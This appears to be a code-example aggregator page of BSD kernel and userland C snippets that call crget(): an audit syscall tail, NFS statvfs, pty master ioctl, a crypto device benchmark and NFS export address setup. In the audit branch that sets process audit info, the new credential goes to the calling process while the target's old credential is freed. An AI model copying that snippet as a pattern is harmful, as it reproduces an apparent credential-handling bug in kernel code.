		if (uap->length != sizeof(udata.au_aupinfo))
			return (EINVAL);
		if (udata.au_aupinfo.ap_pid < 1)
			return (ESRCH);
		newcred = crget();
		if ((tp = pfind(udata.au_aupinfo.ap_pid)) == NULL) {
			crfree(newcred);
			return (ESRCH);
		}
		if ((error = p_cansee(td, tp)) != 0) {
			PROC_UNLOCK(tp);
			crfree(newcred);
			return (error);
		}
		oldcred = tp->p_ucred;
		crcopy(newcred, oldcred);
		newcred->cr_audit.ai_mask.am_success =
		    udata.au_aupinfo.ap_mask.am_success;
		newcred->cr_audit.ai_mask.am_failure =
		    udata.au_aupinfo.ap_mask.am_failure;
		td->td_proc->p_ucred = newcred;
		PROC_UNLOCK(tp);
		crfree(oldcred);
		break;

	case A_SETFSIZE:
		if (uap->length != sizeof(udata.au_fstat))
			return (EINVAL);
		if ((udata.au_fstat.af_filesz != 0) &&
		   (udata.au_fstat.af_filesz < MIN_AUDIT_FILE_SIZE))
			return (EINVAL);
		audit_fstat.af_filesz = udata.au_fstat.af_filesz;
		break;

	case A_GETFSIZE:
		if (uap->length != sizeof(udata.au_fstat))
			return (EINVAL);
		udata.au_fstat.af_filesz = audit_fstat.af_filesz;
		udata.au_fstat.af_currsz = audit_fstat.af_currsz;
		break;

	case A_GETPINFO_ADDR:
		if (uap->length != sizeof(udata.au_aupinfo_addr))
			return (EINVAL);
		if (udata.au_aupinfo_addr.ap_pid < 1)
			return (ESRCH);
		if ((tp = pfind(udata.au_aupinfo_addr.ap_pid)) == NULL)
			return (ESRCH);
		cred = tp->p_ucred;
		udata.au_aupinfo_addr.ap_auid = cred->cr_audit.ai_auid;
		udata.au_aupinfo_addr.ap_mask.am_success =
		    cred->cr_audit.ai_mask.am_success;
		udata.au_aupinfo_addr.ap_mask.am_failure =
		    cred->cr_audit.ai_mask.am_failure;
		udata.au_aupinfo_addr.ap_termid = cred->cr_audit.ai_termid;
		udata.au_aupinfo_addr.ap_asid = cred->cr_audit.ai_asid;
		PROC_UNLOCK(tp);
		break;

	case A_GETKAUDIT:
		if (uap->length != sizeof(udata.au_kau_info))
			return (EINVAL);
		audit_get_kinfo(&udata.au_kau_info);
		break;

	case A_SETKAUDIT:
		if (uap->length != sizeof(udata.au_kau_info))
			return (EINVAL);
		if (udata.au_kau_info.ai_termid.at_type != AU_IPv4 &&
		    udata.au_kau_info.ai_termid.at_type != AU_IPv6)
			return (EINVAL);
		audit_set_kinfo(&udata.au_kau_info);
		break;

	case A_SENDTRIGGER:
		if (uap->length != sizeof(udata.au_trigger))
			return (EINVAL);
		if ((udata.au_trigger < AUDIT_TRIGGER_MIN) ||
		    (udata.au_trigger > AUDIT_TRIGGER_MAX))
			return (EINVAL);
		return (audit_send_trigger(udata.au_trigger));

	default:
		return (EINVAL);
	}

	/*
	 * Copy data back to userspace for the GET comands.
	 */
	switch (uap->cmd) {
	case A_GETPOLICY:
	case A_OLDGETPOLICY:
	case A_GETKMASK:
	case A_GETQCTRL:
	case A_OLDGETQCTRL:
	case A_GETCWD:
	case A_GETCAR:
	case A_GETSTAT:
	case A_GETCOND:
	case A_OLDGETCOND:
	case A_GETCLASS:
	case A_GETPINFO:
	case A_GETFSIZE:
	case A_GETPINFO_ADDR:
	case A_GETKAUDIT:
		error = copyout((void *)&udata, uap->data, uap->length);
		if (error)
			return (error);
		break;
	}

	return (0);
}
예제 #26
0
static int
nfs_statvfs(struct mount *mp, struct statvfs *sbp, struct ucred *cred)
{
	struct vnode *vp;
	struct nfs_statfs *sfp;
	struct nfsmount *nmp = VFSTONFS(mp);
	thread_t td = curthread;
	int error = 0, retattr;
	struct nfsnode *np;
	struct nfsm_info info;

	info.mrep = NULL;
	info.v3 = (nmp->nm_flag & NFSMNT_NFSV3);
	lwkt_gettoken(&nmp->nm_token);

#ifndef nolint
	sfp = NULL;
#endif
	error = nfs_nget(mp, (nfsfh_t *)nmp->nm_fh, nmp->nm_fhsize, &np, NULL);
	if (error) {
		lwkt_reltoken(&nmp->nm_token);
		return (error);
	}
	vp = NFSTOV(np);
	/* ignore the passed cred */
	cred = crget();
	cred->cr_ngroups = 1;
	if (info.v3 && (nmp->nm_state & NFSSTA_GOTFSINFO) == 0)
		(void)nfs_fsinfo(nmp, vp, td);
	nfsstats.rpccnt[NFSPROC_FSSTAT]++;
	nfsm_reqhead(&info, vp, NFSPROC_FSSTAT, NFSX_FH(info.v3));
	ERROROUT(nfsm_fhtom(&info, vp));
	NEGKEEPOUT(nfsm_request(&info, vp, NFSPROC_FSSTAT, td, cred, &error));
	if (info.v3) {
		ERROROUT(nfsm_postop_attr(&info, vp, &retattr,
					 NFS_LATTR_NOSHRINK));
	}
	if (error) {
		if (info.mrep != NULL)
			m_freem(info.mrep);
		goto nfsmout;
	}
	NULLOUT(sfp = nfsm_dissect(&info, NFSX_STATFS(info.v3)));
	sbp->f_flag = nmp->nm_flag;
	sbp->f_owner = nmp->nm_cred->cr_ruid;

	if (info.v3) {
		sbp->f_bsize = NFS_FABLKSIZE;
		sbp->f_frsize = NFS_FABLKSIZE;
		sbp->f_blocks = (fxdr_hyper(&sfp->sf_tbytes) /
				((u_quad_t)NFS_FABLKSIZE));
		sbp->f_bfree = (fxdr_hyper(&sfp->sf_fbytes) /
				((u_quad_t)NFS_FABLKSIZE));
		sbp->f_bavail = (fxdr_hyper(&sfp->sf_abytes) /
				((u_quad_t)NFS_FABLKSIZE));
		sbp->f_files = fxdr_hyper(&sfp->sf_tfiles);
		sbp->f_ffree = fxdr_hyper(&sfp->sf_ffiles);
		sbp->f_favail = fxdr_hyper(&sfp->sf_afiles);
	} else {
		sbp->f_bsize = fxdr_unsigned(int32_t, sfp->sf_bsize);
		sbp->f_blocks = fxdr_unsigned(int32_t, sfp->sf_blocks);
		sbp->f_bfree = fxdr_unsigned(int32_t, sfp->sf_bfree);
		sbp->f_bavail = fxdr_unsigned(int32_t, sfp->sf_bavail);
		sbp->f_files = 0;
		sbp->f_ffree = 0;
		sbp->f_favail = 0;
	}
	sbp->f_syncreads = 0;
	sbp->f_syncwrites = 0;
	sbp->f_asyncreads = 0;
	sbp->f_asyncwrites = 0;
	sbp->f_type = mp->mnt_vfc->vfc_typenum;

	m_freem(info.mrep);
	info.mrep = NULL;
nfsmout:
	vput(vp);
	crfree(cred);
	lwkt_reltoken(&nmp->nm_token);
	return (error);
}
예제 #27
0
int
ptmioctl(dev_t dev, u_long cmd, caddr_t data, int flag, struct proc *p)
{
	dev_t newdev, error;
	struct pt_softc * pti;
	struct nameidata cnd, snd;
	struct filedesc *fdp = p->p_fd;
	struct file *cfp = NULL, *sfp = NULL;
	int cindx, sindx;
	uid_t uid;
	gid_t gid;
	struct vattr vattr;
	struct ucred *cred;
	struct ptmget *ptm = (struct ptmget *)data;

	error = 0;
	switch (cmd) {
	case PTMGET:
		fdplock(fdp);
		/* Grab two filedescriptors. */
		if ((error = falloc(p, &cfp, &cindx)) != 0) {
			fdpunlock(fdp);
			break;
		}
		if ((error = falloc(p, &sfp, &sindx)) != 0) {
			fdremove(fdp, cindx);
			closef(cfp, p);
			fdpunlock(fdp);
			break;
		}

retry:
		/* Find and open a free master pty. */
		newdev = pty_getfree();
		if ((error = check_pty(minor(newdev))))
			goto bad;
		pti = pt_softc[minor(newdev)];
		NDINIT(&cnd, LOOKUP, NOFOLLOW|LOCKLEAF, UIO_SYSSPACE,
		    pti->pty_pn, p);
		if ((error = ptm_vn_open(&cnd)) != 0) {
			/*
			 * Check if the master open failed because we lost
			 * the race to grab it.
			 */
			if (error == EIO && !pty_isfree(minor(newdev)))
				goto retry;
			goto bad;
		}
		cfp->f_flag = FREAD|FWRITE;
		cfp->f_type = DTYPE_VNODE;
		cfp->f_ops = &vnops;
		cfp->f_data = (caddr_t) cnd.ni_vp;
		VOP_UNLOCK(cnd.ni_vp, 0, p);

		/*
		 * Open the slave.
		 * namei -> setattr -> unlock -> revoke -> vrele ->
		 * namei -> open -> unlock
		 * Three stage rocket:
		 * 1. Change the owner and permissions on the slave.
		 * 2. Revoke all the users of the slave.
		 * 3. open the slave.
		 */
		NDINIT(&snd, LOOKUP, NOFOLLOW|LOCKLEAF, UIO_SYSSPACE,
		    pti->pty_sn, p);
		if ((error = namei(&snd)) != 0)
			goto bad;
		if ((snd.ni_vp->v_mount->mnt_flag & MNT_RDONLY) == 0) {
			gid = tty_gid;
			/* get real uid */
			uid = p->p_cred->p_ruid;

			VATTR_NULL(&vattr);
			vattr.va_uid = uid;
			vattr.va_gid = gid;
			vattr.va_mode = (S_IRUSR|S_IWUSR|S_IWGRP) & ALLPERMS;
			/* Get a fake cred to pretend we're root. */
			cred = crget();
			error = VOP_SETATTR(snd.ni_vp, &vattr, cred, p);
			crfree(cred);
			if (error) {
				vput(snd.ni_vp);
				goto bad;
			}
		}
		VOP_UNLOCK(snd.ni_vp, 0, p);
		if (snd.ni_vp->v_usecount > 1 ||
		    (snd.ni_vp->v_flag & (VALIASED)))
			VOP_REVOKE(snd.ni_vp, REVOKEALL);

		/*
		 * The vnode is useless after the revoke, we need to
		 * namei again.
		 */
		vrele(snd.ni_vp);

		NDINIT(&snd, LOOKUP, NOFOLLOW|LOCKLEAF, UIO_SYSSPACE,
		    pti->pty_sn, p);
		/* now open it */
		if ((error = ptm_vn_open(&snd)) != 0)
			goto bad;
		sfp->f_flag = FREAD|FWRITE;
		sfp->f_type = DTYPE_VNODE;
		sfp->f_ops = &vnops;
		sfp->f_data = (caddr_t) snd.ni_vp;
		VOP_UNLOCK(snd.ni_vp, 0, p);

		/* now, put the indexen and names into struct ptmget */
		ptm->cfd = cindx;
		ptm->sfd = sindx;
		memcpy(ptm->cn, pti->pty_pn, sizeof(pti->pty_pn));
		memcpy(ptm->sn, pti->pty_sn, sizeof(pti->pty_sn));

		/* mark the files mature now that we've passed all errors */
		FILE_SET_MATURE(cfp);
		FILE_SET_MATURE(sfp);

		fdpunlock(fdp);
		break;
	default:
		error = EINVAL;
		break;
	}
	return (error);
bad:
	fdremove(fdp, cindx);
	closef(cfp, p);
	fdremove(fdp, sindx);
	closef(sfp, p);
	fdpunlock(fdp);
	return (error);
}
예제 #28
0
static void
runtest(struct alg *alg, int count, int size, u_long cmd, struct timeval *tv)
{
    int i, fd = crget();
    struct timeval start, stop, dt;
    char *cleartext, *ciphertext, *originaltext;
    struct session2_op sop;
    struct crypt_op cop;
    char iv[EALG_MAX_BLOCK_LEN];

    bzero(&sop, sizeof(sop));
    if (!alg->ishash) {
        sop.keylen = (alg->minkeylen + alg->maxkeylen)/2;
        sop.key = (char *) malloc(sop.keylen);
        if (sop.key == NULL)
            err(1, "malloc (key)");
        for (i = 0; i < sop.keylen; i++)
            sop.key[i] = rdigit();
        sop.cipher = alg->code;
    } else {
        sop.mackeylen = (alg->minkeylen + alg->maxkeylen)/2;
        sop.mackey = (char *) malloc(sop.mackeylen);
        if (sop.mackey == NULL)
            err(1, "malloc (mac)");
        for (i = 0; i < sop.mackeylen; i++)
            sop.mackey[i] = rdigit();
        sop.mac = alg->code;
    }
    sop.crid = crid;
    if (ioctl(fd, cmd, &sop) < 0) {
        if (cmd == CIOCGSESSION || cmd == CIOCGSESSION2) {
            close(fd);
            if (verbose) {
                printf("cipher %s", alg->name);
                if (alg->ishash)
                    printf(" mackeylen %u\n", sop.mackeylen);
                else
                    printf(" keylen %u\n", sop.keylen);
                perror("CIOCGSESSION");
            }
            /* hardware doesn't support algorithm; skip it */
            return;
        }
        printf("cipher %s keylen %u mackeylen %u\n",
               alg->name, sop.keylen, sop.mackeylen);
        err(1, "CIOCGSESSION");
    }

    originaltext = malloc(3*size);
    if (originaltext == NULL)
        err(1, "malloc (text)");
    cleartext = originaltext+size;
    ciphertext = cleartext+size;
    for (i = 0; i < size; i++)
        cleartext[i] = rdigit();
    memcpy(originaltext, cleartext, size);
    for (i = 0; i < N(iv); i++)
        iv[i] = rdigit();

    if (verbose) {
        printf("session = 0x%x\n", sop.ses);
        printf("device = %s\n", crfind(sop.crid));
        printf("count = %d, size = %d\n", count, size);
        if (!alg->ishash) {
            printf("iv:");
            hexdump(iv, sizeof iv);
        }
        printf("cleartext:");
        hexdump(cleartext, MIN(size, CHUNK));
    }

    gettimeofday(&start, NULL);
    if (!alg->ishash) {
        for (i = 0; i < count; i++) {
            cop.ses = sop.ses;
            cop.op = COP_ENCRYPT;
            cop.flags = opflags;
            cop.len = size;
            cop.src = cleartext;
            cop.dst = ciphertext;
            cop.mac = 0;
            cop.iv = iv;

            if (ioctl(fd, CIOCCRYPT, &cop) < 0)
                err(1, "ioctl(CIOCCRYPT)");

            if (verify && bcmp(ciphertext, cleartext, size) == 0) {
                printf("cipher text unchanged:");
                hexdump(ciphertext, size);
            }

            memset(cleartext, 'x', MIN(size, CHUNK));
            cop.ses = sop.ses;
            cop.op = COP_DECRYPT;
            cop.flags = opflags;
            cop.len = size;
            cop.src = ciphertext;
            cop.dst = cleartext;
            cop.mac = 0;
            cop.iv = iv;

            if (ioctl(fd, CIOCCRYPT, &cop) < 0)
                err(1, "ioctl(CIOCCRYPT)");

            if (verify && bcmp(cleartext, originaltext, size) != 0) {
                printf("decrypt mismatch:\n");
                printf("original:");
                hexdump(originaltext, size);
                printf("cleartext:");
                hexdump(cleartext, size);
            }
        }
    } else {
        for (i = 0; i < count; i++) {
            cop.ses = sop.ses;
            cop.op = 0;
            cop.flags = opflags;
            cop.len = size;
            cop.src = cleartext;
            cop.dst = 0;
            cop.mac = ciphertext;
            cop.iv = 0;

            if (ioctl(fd, CIOCCRYPT, &cop) < 0)
                err(1, "ioctl(CIOCCRYPT)");
        }
    }
    gettimeofday(&stop, NULL);

    if (ioctl(fd, CIOCFSESSION, &sop.ses) < 0)
        perror("ioctl(CIOCFSESSION)");

    if (verbose) {
        printf("cleartext:");
        hexdump(cleartext, MIN(size, CHUNK));
    }
    timersub(&stop, &start, tv);

    free(originaltext);

    close(fd);
}
예제 #29
0
파일: vfs_export.c 프로젝트: coyizumi/cs111
/*
 * Build hash lists of net addresses and hang them off the mount point.
 * Called by vfs_export() to set up the lists of export addresses.
 */
static int
vfs_hang_addrlist(struct mount *mp, struct netexport *nep,
    struct export_args *argp)
{
	register struct netcred *np;
	register struct radix_node_head *rnh;
	register int i;
	struct radix_node *rn;
	struct sockaddr *saddr, *smask = 0;
	struct domain *dom;
	int error;

	/*
	 * XXX: This routine converts from a `struct xucred'
	 * (argp->ex_anon) to a `struct ucred' (np->netc_anon).  This
	 * operation is questionable; for example, what should be done
	 * with fields like cr_uidinfo and cr_prison?  Currently, this
	 * routine does not touch them (leaves them as NULL).
	 */
	if (argp->ex_anon.cr_version != XUCRED_VERSION) {
		vfs_mount_error(mp, "ex_anon.cr_version: %d != %d",
		    argp->ex_anon.cr_version, XUCRED_VERSION);
		return (EINVAL);
	}

	if (argp->ex_addrlen == 0) {
		if (mp->mnt_flag & MNT_DEFEXPORTED) {
			vfs_mount_error(mp,
			    "MNT_DEFEXPORTED already set for mount %p", mp);
			return (EPERM);
		}
		np = &nep->ne_defexported;
		np->netc_exflags = argp->ex_flags;
		np->netc_anon = crget();
		np->netc_anon->cr_uid = argp->ex_anon.cr_uid;
		crsetgroups(np->netc_anon, argp->ex_anon.cr_ngroups,
		    argp->ex_anon.cr_groups);
		np->netc_anon->cr_prison = &prison0;
		prison_hold(np->netc_anon->cr_prison);
		np->netc_numsecflavors = argp->ex_numsecflavors;
		bcopy(argp->ex_secflavors, np->netc_secflavors,
		    sizeof(np->netc_secflavors));
		MNT_ILOCK(mp);
		mp->mnt_flag |= MNT_DEFEXPORTED;
		MNT_IUNLOCK(mp);
		return (0);
	}

#if MSIZE <= 256
	if (argp->ex_addrlen > MLEN) {
		vfs_mount_error(mp, "ex_addrlen %d is greater than %d",
		    argp->ex_addrlen, MLEN);
		return (EINVAL);
	}
#endif

	i = sizeof(struct netcred) + argp->ex_addrlen + argp->ex_masklen;
	np = (struct netcred *) malloc(i, M_NETADDR, M_WAITOK | M_ZERO);
	saddr = (struct sockaddr *) (np + 1);
	if ((error = copyin(argp->ex_addr, saddr, argp->ex_addrlen)))
		goto out;
	if (saddr->sa_family == AF_UNSPEC || saddr->sa_family > AF_MAX) {
		error = EINVAL;
		vfs_mount_error(mp, "Invalid saddr->sa_family: %d");
		goto out;
	}
	if (saddr->sa_len > argp->ex_addrlen)
		saddr->sa_len = argp->ex_addrlen;
	if (argp->ex_masklen) {
		smask = (struct sockaddr *)((caddr_t)saddr + argp->ex_addrlen);
		error = copyin(argp->ex_mask, smask, argp->ex_masklen);
		if (error)
			goto out;
		if (smask->sa_len > argp->ex_masklen)
			smask->sa_len = argp->ex_masklen;
	}
	i = saddr->sa_family;
	if ((rnh = nep->ne_rtable[i]) == NULL) {
		/*
		 * Seems silly to initialize every AF when most are not used,
		 * do so on demand here
		 */
		for (dom = domains; dom; dom = dom->dom_next) {
			KASSERT(((i == AF_INET) || (i == AF_INET6)), 
			    ("unexpected protocol in vfs_hang_addrlist"));
			if (dom->dom_family == i && dom->dom_rtattach) {
				/*
				 * XXX MRT 
				 * The INET and INET6 domains know the
				 * offset already. We don't need to send it
				 * So we just use it as a flag to say that
				 * we are or are not setting up a real routing
				 * table. Only IP and IPV6 need have this
				 * be 0 so all other protocols can stay the 
				 * same (ABI compatible).
				 */ 
				dom->dom_rtattach(
				    (void **) &nep->ne_rtable[i], 0);
				break;
			}
		}
		if ((rnh = nep->ne_rtable[i]) == NULL) {
			error = ENOBUFS;
			vfs_mount_error(mp, "%s %s %d",
			    "Unable to initialize radix node head ",
			    "for address family", i);
			goto out;
		}
	}
	RADIX_NODE_HEAD_LOCK(rnh);
	rn = (*rnh->rnh_addaddr)(saddr, smask, rnh, np->netc_rnodes);
	RADIX_NODE_HEAD_UNLOCK(rnh);
	if (rn == NULL || np != (struct netcred *)rn) {	/* already exists */
		error = EPERM;
		vfs_mount_error(mp, "Invalid radix node head, rn: %p %p",
		    rn, np);
		goto out;
	}
	np->netc_exflags = argp->ex_flags;
	np->netc_anon = crget();
	np->netc_anon->cr_uid = argp->ex_anon.cr_uid;
	crsetgroups(np->netc_anon, argp->ex_anon.cr_ngroups,
	    argp->ex_anon.cr_groups);
	np->netc_anon->cr_prison = &prison0;
	prison_hold(np->netc_anon->cr_prison);
	np->netc_numsecflavors = argp->ex_numsecflavors;
	bcopy(argp->ex_secflavors, np->netc_secflavors,
	    sizeof(np->netc_secflavors));
	return (0);
out:
	free(np, M_NETADDR);
	return (error);
}